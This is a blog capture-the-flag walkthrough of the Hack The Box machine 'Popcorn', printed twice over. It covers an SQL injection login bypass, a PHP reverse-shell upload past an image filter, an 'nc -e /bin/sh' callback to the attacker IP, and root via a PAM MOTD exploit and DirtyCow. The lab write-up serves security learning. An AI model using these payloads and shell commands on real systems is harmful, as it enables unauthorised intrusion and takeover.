Popcorn was quite a fun one, and the second machine (going top-down) not pwnable just by firing off some Metasploit modules.
IP : 10.10.10.6
OS – Linux
Enumeration:
Nmap reveals a webserver running on port 80. Browsing to the homepage is reveals its a default installation page with no content. Since port 80 is open, we enumerate the web directory, we use gobuster and dirbuster as nikto did not work. We find /torrent in which Torrent Hoster is running.
Exploitation:
To log in, you can do basic manual sql injection or run sqlmap with a captured POST request. In the Username field use {user’ 1=1 LIMIT 1;#} and in the Password field use {password} or add the parameters '-- - to both admin and pass and forward the request then turn intercept off to get admin access
Next we go to the /upload section (http://10.10.10.6/torrent/upload/) and upload a torrent file (Ubuntu,kali) and forward it as a image file via burp. If you use any image file and change its extension from jpg/jpeg/png/gif to torrent, it will not work. The web application is coded in php so we can also use a php shell to bypass the image upload file restriction. Kali has one, just type locate reverse-shell and chose "/usr/share/laudanum/php/php-reverse-shell.php". Do not forget to change the IP and Port, and file extension from file.png to file.php before forwarding. Browse the file to upload and capture the upload request with BURP. OR Download a torrent file and change the extension to file.php.png and forward it to repeater. Insert php code (),url encode it and forward it to repeater then turn intercept off.
Success! Looks like our PHP file is on the server.
Start a listener (nc -lvnp 4444) and browse to and click on the uploaded image in 10.10.10.6/torrent/upload directory. We can initiate the reverse connection by browsing to http://10.10.10.6/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.php?go=nc -e /bin/sh 10.10.14.16 4444 OR click on the [Image File Not Found!]
We get a limited web shell with user www-data. We then get a basic pty shell by running the command: python -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation:
Using cat /etc/issue shows that we are running Ubuntu version 9.10. Next we look for files with root privileges which we can probably write to by the command: find / -perm -4000 2>/dev/null. We found no interesting files. I then ran linuxprivchecker.py 1. we see that the kernel is from 2009 thus we can exploit that using dirtycow or write to file /var/run/motd
searchsploit motd gives us Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation exploit. dpkg -l | grep -i pam confirms that we have pam 1.1.0-2ubuntu1. I copied the exploit and renamed it to exploit.sh file. I then started Python simple http server and download the exploit to the “ /tmp ” directory.
I complied and executed the exploit.sh bash script and boom, we get a root shell!. We can also use the DirtyCow.c exploit from the DirtyCow website.([dirty.c](https://github.com/FireFart/dirtycow/blob/master/dirty.c) ) Copy it to a file and name it dirty.c and download it using python SimpleHTTPServer or apache. Compile and run the exploit. The exploit adds firefart to local user and we see the uid and gid of 0.
We then use ssh ( ssh firefart@10.10.10.6 )or ( su firefart ) to access login to root with the newly created password "password".
And we finally find the ROOT Flag :)
Enumeration:
Nmap reveals a webserver running on port 80. Browsing to the homepage is reveals its a default installation page with no content. Since port 80 is open, we enumerate the web directory, we use gobuster and dirbuster as nikto did not work. We find /torrent in which Torrent Hoster is running.
Exploitation:
To log in, you can do basic manual sql injection or run sqlmap with a captured POST request. In the Username field use {user’ 1=1 LIMIT 1;#} and in the Password field use {password} or add the parameters '-- - to both admin and pass and forward the request then turn intercept off to get admin access
Next we go to the /upload section (http://10.10.10.6/torrent/upload/) and upload a torrent file (Ubuntu,kali) and forward it as a image file via burp. If you use any image file and change its extension from jpg/jpeg/png/gif to torrent, it will not work. The web application is coded in php so we can also use a php shell to bypass the image upload file restriction. Kali has one, just type locate reverse-shell and chose "/usr/share/laudanum/php/php-reverse-shell.php". Do not forget to change the IP and Port, and file extension from file.png to file.php before forwarding. Browse the file to upload and capture the upload request with BURP. OR Download a torrent file and change the extension to file.php.png and forward it to repeater. Insert php code (),url encode it and forward it to repeater then turn intercept off.
Success! Looks like our PHP file is on the server.
Start a listener (nc -lvnp 4444) and browse to and click on the uploaded image in 10.10.10.6/torrent/upload directory. We can initiate the reverse connection by browsing to http://10.10.10.6/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.php?go=nc -e /bin/sh 10.10.14.16 4444 OR click on the [Image File Not Found!]
We get a limited web shell with user www-data. We then get a basic pty shell by running the command: python -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation:
Using cat /etc/issue shows that we are running Ubuntu version 9.10. Next we look for files with root privileges which we can probably write to by the command: find / -perm -4000 2>/dev/null. We found no interesting files. I then ran linuxprivchecker.py 1. we see that the kernel is from 2009 thus we can exploit that using dirtycow or write to file /var/run/motd
searchsploit motd gives us Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation exploit. dpkg -l | grep -i pam confirms that we have pam 1.1.0-2ubuntu1. I copied the exploit and renamed it to exploit.sh file. I then started Python simple http server and download the exploit to the “ /tmp ” directory.
I complied and executed the exploit.sh bash script and boom, we get a root shell!. We can also use the DirtyCow.c exploit from the DirtyCow website.([dirty.c](https://github.com/FireFart/dirtycow/blob/master/dirty.c) ) Copy it to a file and name it dirty.c and download it using python SimpleHTTPServer or apache. Compile and run the exploit. The exploit adds firefart to local user and we see the uid and gid of 0.
We then use ssh ( ssh firefart@10.10.10.6 )or ( su firefart ) to access login to root with the newly created password "password".
And we finally find the ROOT Flag :)
Comments
Post a Comment